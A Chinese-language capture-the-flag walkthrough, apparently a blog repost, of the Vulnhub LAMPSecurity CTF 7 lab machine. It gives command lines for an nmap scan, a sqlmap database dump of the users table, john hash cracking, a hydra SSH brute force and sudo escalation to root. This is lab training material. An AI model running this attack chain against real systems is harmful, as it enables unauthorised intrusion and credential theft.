其他分享
首页 > 其他分享> > 【Vulnhub-LAMPSecurity】CTF 7

【Vulnhub-LAMPSecurity】CTF 7

作者:互联网

0x00环境

攻击机IP:192.168.1.28

目标机IP:192.168.1.136

0x01实战

端口扫描

nmap -sV-A -p- 192.168.1.136

在这里插入图片描述

可以看到开放了很多端口,其中80、8080、901、10000是http服务,那么我们就先去尝试访问这几个端口

http://192.168.1.136/就是正常的Web页面
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mhQWKoH1-1644369536166)(img/image-20220119140348097.png)]

http://192.168.1.136:8080/login.php是一个登录的页面
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xYxOkhZp-1644369536166)(img/image-20220119140450749.png)]

http://192.168.1.136:901/也是需要登录才能查看

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZRJpqFaA-1644369536167)(img/image-20220119140826778.png)]

http://192.168.1.136:10000/也是一个登录页面,尝试了万能密码无法绕过。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1TX1Mos9-1644369536168)(img/image-20220119141102689.png)]

漏洞发现

经过长时间的查找发现在http://192.168.1.136:8080/login.php处存在SQL注入可以使用万能密码绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ayMrX85h-1644369536169)(img/image-20220119141434382.png)]

成功登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PHXRsF6c-1644369536169)(img/image-20220119141452177.png)]

漏洞利用

使用sqlmap跑一下,使用burp抓包,将数据包保存并命名为sql.txt
暴库

sqlmap -r sql.txt --dbs

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p52q5YjK-1644369536171)(img/image-20220119142058548.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eeDdkFwb-1644369536171)(img/image-20220119142320326.png)]

爆表

sqlmap -r sql.txt -D website --tables

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sSkFyc60-1644369536172)(img/image-20220119142419938.png)]

暴字段

sqlmap -r sql.txt -D website -T users --columns

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5W30cL3n-1644369536173)(img/image-20220119142451735.png)]

拖库

sqlmap -r sql.txt -D website -T users -C username,password --dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fKKMhlB6-1644369536174)(img/image-20220119142616734.png)]

将用户名和密码拖下来分别保存为username.txt和password.txt,使用john破解密码

john --format=Raw-MD5 password.txt

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzajY38M-1644369536174)(img/image-20220119143752306.png)]

太慢了还是使用网站

最终结果

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YQ7E0V5p-1644369536175)(img/image-20220119143859956.png)]

将得到的明文密码保存为password2.txt,使用hydra进行爆破

hydra -L username.txt -P password2.txt -t 4 192.168.1.136 ssh

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FpyitEXt-1644369536175)(img/image-20220119145637946.png)]

在前面的端口扫描中我们看到开放了22-SSH端口,尝试登录,登录成功。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xjq7sj1D-1644369536176)(img/image-20220119150253570.png)]

提权

查看当前用户可以使用的sudo权限

sudo -l

在这里插入图片描述

可以看到当前用户可以以root身份运行所有命令

尝试使用sudo su提升权限,成功拿到root权限

sudo su

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gJrmfI17-1644369536177)(img/image-20220119150608198.png)]

标签:sqlmap,http,LAMPSecurity,192.168,1.136,--,CTF,Vulnhub,txt
来源: https://blog.csdn.net/qq_44276741/article/details/122835156